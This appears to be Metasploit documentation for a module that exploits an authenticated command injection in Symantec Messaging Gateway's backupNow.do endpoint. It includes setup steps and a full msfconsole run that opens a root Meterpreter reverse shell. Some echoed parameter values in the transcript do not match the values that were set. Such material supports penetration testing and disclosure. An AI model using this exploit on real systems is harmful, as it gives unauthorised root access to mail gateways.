## Vulnerable Application This module exploits the command injection vulnerability of Symantec Messaging Gateway product. An authenticated user can execute a terminal command under the context of the web server user which is root. backupNow.do endpoint takes several user inputs and then pass them to the internal service which is responsible for executing operating system command. One of the user input is being passed to the service without proper validation. That cause an command injection vulnerability. But given parameters, such a SSH ip address, port and credentials are validated before executing terminal command. Thus, you need to configure your own SSH service and set the required parameter during module usage. **Vulnerable Application Installation Steps** Click on the "free trial" button at the following URL. [https://www.symantec.com/products/messaging-security/messaging-gateway](https://www.symantec.com/products/messaging-security/messaging-gateway) You need to complete the reqistration in order to download ISO file. License file will be delivered to your e-mail address ## Verification Steps A successful check of the exploit will look like this: ``` msf > use exploit/linux/http/symantec_messaging_gateway_exec msf exploit(symantec_messaging_gateway_exec) > set RHOST 12.0.0.199 RHOST => 12.0.0.199 msf exploit(symantec_messaging_gateway_exec) > set LHOST 12.0.0.1 LHOST => 12.0.0.1 msf exploit(symantec_messaging_gateway_exec) > set USERNAME admin USERNAME => admin msf exploit(symantec_messaging_gateway_exec) > set PASSWORD qwe123 PASSWORD => qwe123 msf exploit(symantec_messaging_gateway_exec) > set SSH_ADDRESS 12.0.0.15 SSH_ADDRESS => 127.0.0.1 msf exploit(symantec_messaging_gateway_exec) > set SSH_USERNAME root SSH_USERNAME => root msf exploit(symantec_messaging_gateway_exec) > set SSH_PASSWORD toor SSH_PASSWORD => qwe123 msf exploit(symantec_messaging_gateway_exec) > run [*] Started reverse TCP handler on 12.0.0.1:4444 [*] Performing authentication... [+] Awesome..! Authenticated with admin:qwe123 [*] Capturing CSRF token [+] CSRF token is : 48f39f735f15fcaccd0aacc40b27a67bf76f2bb1 [*] Sending stage (39842 bytes) to 12.0.0.199 [*] Meterpreter session 1 opened (12.0.0.1:4444 -> 12.0.0.199:53018) at 2017-04-30 14:00:12 +0300 meterpreter > getuid Server username: root meterpreter > sysinfo Computer : hacker.dev OS : Linux 2.6.32-573.3.1.el6.x86_64 #1 SMP Thu Aug 13 22:55:16 UTC 2015 Architecture : x64 System Language : en_US Meterpreter : python/linux meterpreter > ```